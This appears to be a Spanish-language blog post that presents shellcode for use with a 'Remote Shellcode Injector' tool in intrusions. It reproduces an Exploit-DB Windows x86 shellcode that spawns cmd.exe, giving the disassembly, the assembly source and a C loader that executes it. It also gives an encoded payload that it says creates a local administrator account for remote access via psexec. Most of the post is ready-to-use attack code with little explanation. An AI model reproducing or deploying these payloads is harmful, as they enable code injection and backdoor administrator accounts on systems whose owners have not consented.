Buenas a todos, durante estas semanas hemos estado viendo el funcionamiento de Remote Shellcode Injector, una simple pero útil herramienta para vuestros procesos de intrusión.
Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!
Hoy quería jugar con vosotros con algunas shellcodes publicadas en Exploit-DB, como la siguiente, con la que ejecutaremos una consola de comandos:
/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86*//*Disassembly of section .text:00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx00000025 <func>: 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 <func> 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 <func> 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 <func> 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff 
d6 call *%esi a9: 59 pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax*//*section .text global _start_start:xor ecx,ecxmov eax,[fs:ecx+0x30] ;PEBmov eax,[eax+0xc] ;PEB->ldrmov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleListlodsdxchg esi,eaxlodsdmov ecx,[eax+0x10] ;kernel32 base addressxor ebx,ebxmov ebx,[ecx+0x3c] ;DOS->elf_anewadd ebx,ecx ;PE HEADERmov ebx,[ebx+0x78] ;DataDirectory->VirtualAddressadd ebx,ecx ;IMAGE_EXPORT_DIRECTORYmov esi,[ebx+0x20] ;AddressOfNamesadd esi,ecx;---------------------------------------------xor edx,edxfunc:inc edxlodsdadd eax,ecxcmp dword [eax],'GetP'jnz funccmp dword [eax+4],'rocA'jnz funccmp dword [eax+8],'ddre'jnz func;--------------------------------mov esi,[ebx+0x1c] ;AddressOfFunctionsadd esi,ecxmov edx,[esi+edx*4]add edx,ecx ;GetProcAddress();-------------------------------------mov esi,edxmov edi,ecx;-------------------------xor ebx,ebx;finding address of RtlZeroMemory()push 0x41414179mov [esp+1],word bxpush 0x726f6d65push 0x4d6f7265push 0x5a6c7452push esppush ecxcall edx;------------------------------add esp,16;-----------------------------------;zero out 84 bytesxor ecx,ecxmov edx,ecxmov dl,84push 
ecxsub esp,84lea ecx,[esp]push ecxpush edxpush ecxcall eax;----------------------------;finding address of CreateProcessA()pop ecxxor edx,edxpush 0x42424173mov [esp+2],word dxpush 0x7365636fpush 0x72506574push 0x61657243lea edx,[esp]push ecxpush edxpush edicall esi;--------------------------------;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)pop ecxadd esp,16xor ebx,ebxpush 0x41657865mov [esp+3],byte blpush 0x2e646d63lea ebx,[esp]xor edx,edxmov dl,68mov [ecx],edxlea edx,[ecx+68]push esi ;xor esi,esipush edxpush ecxpush esipush esipush esipush esipush esipush esipush ebxpush esicall eaxpop esi;-------------------------------------;finding address of ExitProcess()add esp,8xor ebx,ebxpush 0x41737365mov [esp+3],byte blpush 0x636f7250push 0x74697845lea ebx,[esp]push ebxpush edicall esixor ecx,ecxpush ecxcall eax*/#include<stdio.h>#include<string.h>char shellcode[]=\"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";main(){printf("shellcode lenght 
%ld\n",(long)strlen(shellcode));(* (int(*)()) shellcode) ();}
Aquí vemos un ejemplo de su ejecución:
Muy útil también es crearnos un usuario administrador local, con el que podamos acceder remotamente, por ejemplo a través de psexec, como en este otro ejemplo que tenemos a continuación:
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b""\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a""\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25""\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2""\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c""\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe""\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc""\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71""\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f""\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53""\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e""\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43""\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6""\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4""\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6""\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5""\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41""\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0""\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3""\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06""\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9""\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!
